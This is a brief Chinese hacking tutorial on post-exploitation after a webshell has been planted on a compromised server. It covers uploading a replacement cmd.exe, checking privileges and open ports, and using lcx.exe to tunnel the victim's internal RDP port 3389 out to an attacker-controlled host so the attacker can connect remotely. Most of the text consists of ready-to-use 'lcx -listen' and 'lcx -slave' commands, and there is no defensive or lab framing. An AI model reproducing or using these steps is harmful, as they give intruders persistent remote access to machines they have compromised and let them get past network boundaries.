前提:上传大马进行提权
1.点击CMD命令,输入whoami
2.显示拒绝访问,由此可以知道,系统cmd.exe不可用,可能是被删除或者是禁止掉,需要我们自己上传一个cmd.exe
3.网上下载一个cmd.exe,上传到网站可执行可读写的目录下
4.执行cmd命令,查看当前权限
5.执行netstat -an或者端口扫描,查看开发端口
Lcx.exe是一个端口转发工具,相当于把肉鸡A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于链接A机的3389端口。
Lcx有两大功能,一个是端口转发(listen和slave成对使用),另一个是端口映射(tran)。
端口转发:
Lcx -Listen <监听slave请求的端口(对应slave的第二个参数)> <等待连接的端口>
Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>
Lcx只有3种命令,常用的有2种(slave和listen)
端口转发:
第一种方法:被控机和内网上传lcx.exe
1.查找中间机的外网ip: 2.2.2.2
2.中间机监听: lcx.exe -listen 51 10000
3.内网机设置: lcx.exe -slave 2.2.2.2 51 127.0.0.1 3389
4.外网机连接被控制机的外网ip: mstsc 2.2.2.2:10000
第二种方法:内网机不能上传lcx.exe
1.确定内网ip和本地ip,不需要被控制机的ip
2.本地执行:lcx -listen 40050 10000 //监听端口,连接端口
3.被控制的计算机执行:lcx -slave 1.1.1.1 40050 10.10.0.3 3389 //监听端口,目标端口
4.用mstsc链接:127.0.0.1:10000
端口映射:
Lcx -tran <等待连接的端口> <目标ip> <目标端口>